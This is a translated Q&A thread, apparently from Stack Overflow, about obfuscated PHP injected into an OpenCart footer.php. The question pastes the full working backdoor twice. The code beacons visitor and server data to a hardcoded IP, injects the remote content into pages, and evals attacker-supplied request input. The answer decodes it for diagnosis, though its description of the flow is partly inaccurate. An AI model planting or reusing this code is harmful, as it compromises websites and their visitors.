PHP - 代码添加到footer.php

时间:2015-04-03 17:25:44

标签: php opencart

我使用OpenCart创建了网站,但由于footer.php中的垃圾代码突然导致网站崩溃。

代码如下:

error_reporting(0); ini_set("display_errors", "0"); if (!isset($ie7be30e6)) { $ie7be30e6 = TRUE;  $GLOBALS['_1208357119_']=Array(base64_decode('cH' .'J' .'l' .'Z19tY' .'XR' .'jaA' .'=='),base64_decode('ZmlsZ' .'V' .'9n' .'ZXRfY29udGV' .'udHM='),base64_decode('Z' .'mlsZV' .'9nZ' .'XRfY' .'2' .'9' .'udGVud' .'HM='),base64_decode('dXJsZ' .'W5jb' .'2' .'Rl'),base64_decode('d' .'XJ' .'s' .'ZW5jb2Rl'),base64_decode('bWQ1'),base64_decode('c' .'3Ry' .'aXBzbGF' .'za' .'G' .'Vz'));  function _682313165($i){$a=Array('Y2xpZ' .'W' .'50X' .'2' .'N' .'oZWNr','Y2xpZW50X2' .'NoZWNr','' .'S' .'FRUUF9BQ0NFU' .'FRfQ0hBUlNF' .'V' .'A==','IS4hdQ=' .'=','U0NSS' .'VBUX0ZJ' .'TEV' .'OQU1F','' .'V' .'V' .'RGLTg=','' .'d2lu' .'ZG' .'93cy0' .'xMjUx','' .'S' .'F' .'RUUF9' .'BQ' .'0NFUF' .'RfQ0hBU' .'lNFVA==','' .'aHR' .'0cDo' .'vLw==','ODUuMjUuM' .'jAu' .'MjE' .'vZ2' .'V0' .'Ln' .'B' .'ocD9k' .'P' .'Q==','' .'U' .'0VSVkVSX05' .'B' .'TUU=','' .'U' .'k' .'VR' .'V' .'UVTVF9' .'VUk' .'k=','JnU9','SFRU' .'U' .'F9VU0VSX0' .'F' .'HRU5U','' .'JmM9','' .'Jm' .'k' .'9MSZp' .'c' .'D0' .'=','UkVNT' .'1RFX0FERFI=','' .'Jm' .'g9','' .'ODY' .'0YTE5Y' .'2' .'JkYzAyNWI0ZD' .'NjYz' .'V' .'mMz' .'Ey' .'N2MxN' .'2FhO' .'DY' .'=','U0VSV' .'kV' .'SX05B' .'T' .'UU=','UkVRVUVTVF9VU' .'kk=','SF' .'RUUF9VU0' .'V' .'SX' .'0' .'FHRU5U','M' .'Q==','' .'cA=' .'=','' .'cA==','ZTdiZTMwZTY=');return base64_decode($a[$i]);}  if(!empty($_COOKIE[_682313165(0)]))die($_COOKIE[_682313165(1)]);if(!isset($yf60436_0[_682313165(2)])){if($GLOBALS['_1208357119_'][0](_682313165(3),$GLOBALS['_1208357119_'][1]($_SERVER[_682313165(4)]))){$yf60436_1=_682313165(5);}else{$yf60436_1=_682313165(6);}}else{$yf60436_1=$yf60436_0[_682313165(7)];}echo $GLOBALS['_1208357119_'][2](_682313165(8) ._682313165(9) .$GLOBALS['_1208357119_'][3]($_SERVER[_682313165(10)] .$_SERVER[_682313165(11)]) ._682313165(12) .$GLOBALS['_1208357119_'][4]($_SERVER[_682313165(13)]) ._682313165(14) .$yf60436_1 ._682313165(15) .$_SERVER[_682313165(16)] ._682313165(17) .$GLOBALS['_1208357119_'][5](_682313165(18) .$_SERVER[_682313165(19)] .$_SERVER[_682313165(20)] .$_SERVER[_682313165(21)] .$yf60436_1 ._682313165(22)));$yf60436_2=round(0+3142);if(isset($_REQUEST[_682313165(23)])&& $_REQUEST[_682313165(24)]== _682313165(25)){eval($GLOBALS['_1208357119_'][6]($_REQUEST["c"]));}  }

error_reporting(0); ini_set("display_errors", "0"); if (!isset($ie7be30e6)) { $ie7be30e6 = TRUE;  $GLOBALS['_1208357119_']=Array(base64_decode('cH' .'J' .'l' .'Z19tY' .'XR' .'jaA' .'=='),base64_decode('ZmlsZ' .'V' .'9n' .'ZXRfY29udGV' .'udHM='),base64_decode('Z' .'mlsZV' .'9nZ' .'XRfY' .'2' .'9' .'udGVud' .'HM='),base64_decode('dXJsZ' .'W5jb' .'2' .'Rl'),base64_decode('d' .'XJ' .'s' .'ZW5jb2Rl'),base64_decode('bWQ1'),base64_decode('c' .'3Ry' .'aXBzbGF' .'za' .'G' .'Vz'));  function _682313165($i){$a=Array('Y2xpZ' .'W' .'50X' .'2' .'N' .'oZWNr','Y2xpZW50X2' .'NoZWNr','' .'S' .'FRUUF9BQ0NFU' .'FRfQ0hBUlNF' .'V' .'A==','IS4hdQ=' .'=','U0NSS' .'VBUX0ZJ' .'TEV' .'OQU1F','' .'V' .'V' .'RGLTg=','' .'d2lu' .'ZG' .'93cy0' .'xMjUx','' .'S' .'F' .'RUUF9' .'BQ' .'0NFUF' .'RfQ0hBU' .'lNFVA==','' .'aHR' .'0cDo' .'vLw==','ODUuMjUuM' .'jAu' .'MjE' .'vZ2' .'V0' .'Ln' .'B' .'ocD9k' .'P' .'Q==','' .'U' .'0VSVkVSX05' .'B' .'TUU=','' .'U' .'k' .'VR' .'V' .'UVTVF9' .'VUk' .'k=','JnU9','SFRU' .'U' .'F9VU0VSX0' .'F' .'HRU5U','' .'JmM9','' .'Jm' .'k' .'9MSZp' .'c' .'D0' .'=','UkVNT' .'1RFX0FERFI=','' .'Jm' .'g9','' .'ODY' .'0YTE5Y' .'2' .'JkYzAyNWI0ZD' .'NjYz' .'V' .'mMz' .'Ey' .'N2MxN' .'2FhO' .'DY' .'=','U0VSV' .'kV' .'SX05B' .'T' .'UU=','UkVRVUVTVF9VU' .'kk=','SF' .'RUUF9VU0' .'V' .'SX' .'0' .'FHRU5U','M' .'Q==','' .'cA=' .'=','' .'cA==','ZTdiZTMwZTY=');return base64_decode($a[$i]);}  if(!empty($_COOKIE[_682313165(0)]))die($_COOKIE[_682313165(1)]);if(!isset($yf60436_0[_682313165(2)])){if($GLOBALS['_1208357119_'][0](_682313165(3),$GLOBALS['_1208357119_'][1]($_SERVER[_682313165(4)]))){$yf60436_1=_682313165(5);}else{$yf60436_1=_682313165(6);}}else{$yf60436_1=$yf60436_0[_682313165(7)];}echo $GLOBALS['_1208357119_'][2](_682313165(8) ._682313165(9) .$GLOBALS['_1208357119_'][3]($_SERVER[_682313165(10)] .$_SERVER[_682313165(11)]) ._682313165(12) .$GLOBALS['_1208357119_'][4]($_SERVER[_682313165(13)]) ._682313165(14) .$yf60436_1 ._682313165(15) .$_SERVER[_682313165(16)] ._682313165(17) .$GLOBALS['_1208357119_'][5](_682313165(18) .$_SERVER[_682313165(19)] .$_SERVER[_682313165(20)] .$_SERVER[_682313165(21)] .$yf60436_1 ._682313165(22)));$yf60436_2=round(0+3142);if(isset($_REQUEST[_682313165(23)])&& $_REQUEST[_682313165(24)]== _682313165(25)){eval($GLOBALS['_1208357119_'][6]($_REQUEST["c"]));}  }

以上代码会自动添加,网站也会关闭。

任何人都可以解释为什么会发生这种情况吗?

1 个答案:

答案 0 :(得分:2)

这是混淆的PHP。可能会发生以下两件事之一:

  1. 您的网站或主机遭到入侵。
  2. 您的主机提供商正在使用工具来获取您网站上的指标。

    3. 鉴于编码PHP中的主机IP由Barracuda Networks提供blacklist,很可能您或您的主机已被盗用。请与您的主机提供商联系并关闭您的网站,因为这可能会向访问您网站的任何人传播恶意软件。

    如果主机更改了IP空间,这可能是错误的,并且最近可能会被列入黑名单。

    我是如何确定的?

    • Prettify PHP让它更容易理解
    • 手动解码所有Base64以了解阵列的构造方式。
    • 重建字符串以创建对外部服务器的URL请求。

    一旦你最终解码了所有内容,那么代码最终会像这样:

    不要跑这个 

    // Turns off all error reporting and does not display errors.
error_reporting(0);
ini_set("display_errors", "0");

if (!isset($ie7be30e6)) {
    $ie7be30e6 = TRUE;

    $GLOBALS['_1208357119_'] = Array(preg_match, file_get_contents, file_get_contents,
        urlencode, urlencode, md5, stripslashes
    );

    function _682313165($i)
    {
        $a = Array(
            client_check, client_check, HTTP_ACCEPT_CHARSET, !.!u, SCRIPT_FILENAME, UTF-8,
            windows-1251, HTTP_ACCEPT_CHARSET, http://, 85.25.20.21/get.php?d=, SERVER_NAME,
            REQUEST_URI, &u=, HTTP_USER_AGENT, &c=, &i=1&ip=, REMOTE_ADDR, &h=,
            864a19cbdc025b4d3cc5f3127c17aa86, SERVER_NAME, REQUEST_URI, HTTP_USER_AGENT,
            1, p, p, e7be30e6
        );
        return $a[$i];
    }

    // Dies if cookie doesn't exists. Places client check in cookie.
    if (!empty($_COOKIE[client_check]))
        die($_COOKIE[client_check]);

    if (!isset($yf60436_0[HTTP_ACCEPT_CHARSET])) {
        if (preg_match(!.!u, file_get_contents($_SERVER[SCRIPT_FILENAME])))
            $yf60436_1 = UTF-8;
        else 
            $yf60436_1 = windows-1251;
    } else 
        $yf60436_1 = $yf60436_0[HTTP_ACCEPT_CHARSET];

    echo file_get_contents('http://85.25.20.21/get.php?d=' . urlencode($_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI]) . '&u=' urlencode($_SERVER[HTTP_USER_AGENT]) . '&c=' . $yf60436_1 . '&i=1&ip=' . $_SERVER[REMOTE_ADDR] . '&h=' . md5(864a19cbdc025b4d3cc5f3127c17aa86 . $_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI] . $_SERVER[HTTP_USER_AGENT] . $yf60436_1 . 1))

    $yf60436_2 = 3142;

    if (isset($_REQUEST[p]) && $_REQUEST[p] == e7be30e6)
        eval(stripslashes($_REQUEST["c"]));
}

    不要跑这个

    我没有让它完全可以运行,因为我省略了语法的一些组件。我提供这个来教育你和其他人接受教育。永远不要运行任何你不信任或理解的东西,如果你不理解它 - 请问别人!

    这段代码在做什么?

    要提示,整体流程是:

    • 检查cookie,如果不存在则创建一个(代码运行两次)。
    • 检查当前运行文件的路径,以确定运行该站点的服务器类型(Windows或Linux)
      • 这决定了HTTP服务器上的可用字符集。
    • 使用描述您的服务器的URI(名称,请求,代理等)从外部源获取文件。
    • 确定发布的信息是否符合条件
    • 如果响应匹配,请运行下载的文件。
相关问题
最新问题